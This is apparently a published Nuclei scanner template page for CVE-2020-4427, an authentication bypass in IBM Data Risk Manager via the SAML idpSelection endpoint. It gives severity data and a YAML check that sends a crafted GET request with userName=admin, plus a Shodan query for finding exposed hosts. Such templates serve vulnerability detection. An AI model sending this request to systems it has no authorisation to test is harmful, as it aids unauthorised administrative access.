IBM Data Risk Manager - Authentication Bypass via SAML

CVE-2020-4427
Early Release

Description

IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system.

Severity

Critical

CVSS Score

9.8

Exploit Probability

56%

Affected Product

data_risk_manager

Published Date

October 10, 2025

Template Author

ritikchaddha

CVE-2020-4427.yaml
id: CVE-2020-4427

info:
  name: IBM Data Risk Manager - Authentication Bypass via SAML
  author: ritikchaddha
  severity: critical
  description: |
    IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ibm_drm_rce.rb
    - https://seclists.org/fulldisclosure/2020/Apr/33
    - https://www.ibm.com/support/pages/node/6206875
    - https://nvd.nist.gov/vuln/detail/CVE-2020-4427
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-4427
    cwe-id: CWE-287
    epss-score: 0.55750
    epss-percentile: 0.97955
    cpe: cpe:2.3:a:ibm:data_risk_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    vendor: ibm
    product: data_risk_manager
    shodan-query: title:"IBM Data Risk Manager"
  tags: cve,cve2020,ibm,saml,auth-bypass,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/albatross/saml/idpSelection?id={{randstr}}&userName=admin"

    matchers-condition: and
    matchers:
      - type: word
        part: location
        words:
          - "localhost:8765"
          - "saml/idpSelection"
        condition: and

      - type: status
        status:
          - 302

    extractors:
      - type: kval
        part: header
        kval:
          - location
# digest: 4a0a0047304502204245137dca694b5d9631dd0a18a2f1924d39243b937b5e8ef0b13b2398f09c0e022100b62e1b338b3d742d9f0a17d15b85018bc72e00472f09880bc32d59e5d5895fdc:922c64590222798bb761d5b6d8e72950